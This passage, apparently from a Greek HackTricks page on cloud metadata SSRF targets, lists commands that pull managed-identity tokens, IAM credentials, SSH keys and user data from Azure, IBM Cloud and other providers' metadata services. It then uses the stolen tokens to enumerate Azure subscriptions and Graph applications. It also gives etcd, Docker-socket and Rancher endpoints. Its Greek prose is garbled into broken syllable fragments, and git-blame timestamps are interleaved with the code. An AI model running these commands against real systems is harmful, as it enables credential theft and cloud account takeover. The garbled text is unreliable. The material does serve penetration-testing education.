$userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021- 01-01& format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
2022-09-25 22:19:09 +00:00
# Paths
/metadata/instance?api-version=2017-04-02
/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02& format=text
/metadata/instance/compute/userData?api-version=2021-01-01& format=text
2022-02-13 12:30:13 +00:00
```
2024-07-19 16:35:17 +00:00
{% endtab %}
{% endtabs %}
2024-04-06 18:31:47 +00:00
2024-07-19 16:35:17 +00:00
### Azure App Service
2022-09-25 14:14:17 +00:00
2024-07-19 16:35:17 +00:00
Από το **env** μπορείτε ν α `IDENTITY_HEADER` _κα ι `IDENTITY_ENDPOINT` . Αυτές μπορείτε ν α γ ι α ν α γ ι α ν α
2022-09-25 14:14:17 +00:00
2024-07-19 16:35:17 +00:00
Ο ι γ ι α
2022-10-26 12:49:19 +00:00
* [https://storage.azure.com ](https://storage.azure.com/ )
* [https://vault.azure.net ](https://vault.azure.net/ )
* [https://graph.microsoft.com ](https://graph.microsoft.com/ )
* [https://management.azure.com ](https://management.azure.com/ )
2022-09-25 14:14:17 +00:00
```bash
# Check for those env vars to know if you are in an Azure app
echo $IDENTITY_HEADER
echo $IDENTITY_ENDPOINT
# You should also be able to find the folder:
ls /opt/microsoft
#and the file
ls /opt/microsoft/msodbcsql17
2022-09-25 14:51:27 +00:00
# Get management token
2022-09-25 14:14:17 +00:00
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/& api-version=2017-09-01" -H secret:$IDENTITY_HEADER
2022-09-25 14:51:27 +00:00
# Get graph token
curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/& api-version=2017-09-01" -H secret:$IDENTITY_HEADER
2022-09-25 14:14:17 +00:00
# API
# Get Subscriptions
URL="https://management.azure.com/subscriptions?api-version=2020-01-01"
curl -H "Authorization: $TOKEN" "$URL"
# Get current permission on resources in the subscription
URL="https://management.azure.com/subscriptions/< subscription-uid > /resources?api-version=2020-10-01'"
curl -H "Authorization: $TOKEN" "$URL"
# Get permissions in a VM
URL="https://management.azure.com/subscriptions/< subscription-uid > /resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/< VM-name > /providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
curl -H "Authorization: $TOKEN" "$URL"
```
```powershell
2022-09-25 14:51:27 +00:00
# API request in powershell to management endpoint
2022-09-25 14:14:17 +00:00
$Token = 'eyJ0eX..'
$URI='https://management.azure.com/subscriptions?api-version=2020-01-01'
2022-09-25 14:51:27 +00:00
$RequestParams = @{
2024-02-10 22:40:18 +00:00
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
2022-09-25 14:51:27 +00:00
}
(Invoke-RestMethod @RequestParams ).value
# API request to graph endpoint (get enterprise applications)
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
2022-09-25 14:14:17 +00:00
$RequestParams = @{
2024-02-10 22:40:18 +00:00
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
2022-09-25 14:14:17 +00:00
}
(Invoke-RestMethod @RequestParams ).value
2022-09-25 14:51:27 +00:00
# Using AzureAD Powershell module witho both management and graph tokens
$token = 'eyJ0e..'
$graphaccesstoken = 'eyJ0eX..'
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc
# Try to get current perms over resources
Get-AzResource
## The following error means that the user doesn't have permissions over any resource
Get-AzResource : 'this.Client.SubscriptionId' cannot be null.
At line:1 char:1
+ Get-AzResource
+ ~~~~~~~~~~~~~~
2024-02-10 22:40:18 +00:00
+ CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException
+ FullyQualifiedErrorId :
2022-09-25 14:51:27 +00:00
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
2022-09-25 14:14:17 +00:00
```
2024-01-22 12:24:45 +00:00
## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>
2023-02-10 12:30:22 +00:00
{% hint style="warning" %}
2024-07-19 16:35:17 +00:00
Σημειώστε ότι στην IBM, από προεπιλογή, τα μεταδεδομένα δεν είναι ενεργοποιημένα, οπότε είναι πιθανό ν α ν α α ν
2023-02-10 12:30:22 +00:00
{% endhint %}
{% code overflow="wrap" %}
```bash
export instance_identity_token=`curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01"\
2024-02-10 22:40:18 +00:00
-H "Metadata-Flavor: ibm"\
-H "Accept: application/json"\
-d '{
"expires_in": 3600
}' | jq -r '(.access_token)'`
2023-02-10 12:30:22 +00:00
# Get instance details
curl -s -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" -X GET "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" | jq
# Get SSH keys info
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" | jq
# Get SSH keys fingerprints & user data
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" | jq
# Get placement groups
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" | jq
# Get IAM credentials
curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" | jq
```
{% endcode %}
2024-07-19 16:35:17 +00:00
Η γ ι α ν α γ ι α γ ι α
2023-02-10 12:30:22 +00:00
2024-02-06 03:10:27 +00:00
## Packetcloud
2023-02-10 12:30:22 +00:00
2024-07-19 16:35:17 +00:00
Για την πρόσβαση στα μεταδεδομένα του Packetcloud, η τεκμηρίωση μπορεί ν α https://metadata.packet.net/userdata ](https://metadata.packet.net/userdata )
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## OpenStack/RackSpace
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Η γ ι α Τ α ν α
2024-02-23 17:48:55 +00:00
* `http://169.254.169.254/openstack`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## HP Helion
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Η γ ι α Τ α
2024-02-23 17:48:55 +00:00
* `http://169.254.169.254/2009-04-04/meta-data/`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Oracle Cloud
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Η γ ι α
2024-02-23 17:48:55 +00:00
* `http://192.0.0.192/latest/`
* `http://192.0.0.192/latest/user-data/`
* `http://192.0.0.192/latest/meta-data/`
* `http://192.0.0.192/latest/attributes/`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Alibaba
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Η γ ι α
2024-02-23 17:48:55 +00:00
* `http://100.100.100.200/latest/meta-data/`
* `http://100.100.100.200/latest/meta-data/instance-id`
* `http://100.100.100.200/latest/meta-data/image-id`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Kubernetes ETCD
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Τ ο ν α Η
2024-02-23 17:48:55 +00:00
* `curl -L http://127.0.0.1:2379/version`
* `curl http://127.0.0.1:2379/v2/keys/?recursive=true`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Docker
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Τ α ν α γ ι α
2024-02-23 17:48:55 +00:00
2024-07-19 16:35:17 +00:00
* Απλό παράδειγμα γ ι α
2024-02-23 17:48:55 +00:00
* `docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash`
2024-07-19 16:35:17 +00:00
* Μέσα στο κοντέινερ, χρησιμοποιήστε curl με το Docker socket:
2024-02-23 17:48:55 +00:00
* `curl --unix-socket /var/run/docker.sock http://foo/containers/json`
* `curl --unix-socket /var/run/docker.sock http://foo/images/json`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Rancher
2022-02-13 12:30:13 +00:00
2024-07-19 16:35:17 +00:00
Τ α ν α
2022-02-13 12:30:13 +00:00
2024-02-23 17:48:55 +00:00
* `curl http://rancher-metadata/<version>/<path>`
2024-07-19 16:35:17 +00:00
**Try Hard Security Group**
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Μάθετε & εξασκηθείτε στο AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Μάθετε & εξασκηθείτε στο GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
< details >
< summary > Υποστήριξη HackTricks< / summary >
* Ελέγξτε τα [**σχέδια συνδρομής** ](https://github.com/sponsors/carlospolop )!
* **Εγγραφείτε στην** 💬 [**ομάδα Discord** ](https://discord.gg/hRep4RUj7f ) ή στην [**ομάδα telegram** ](https://t.me/peass ) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) και [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
< / details >
{% endhint %}
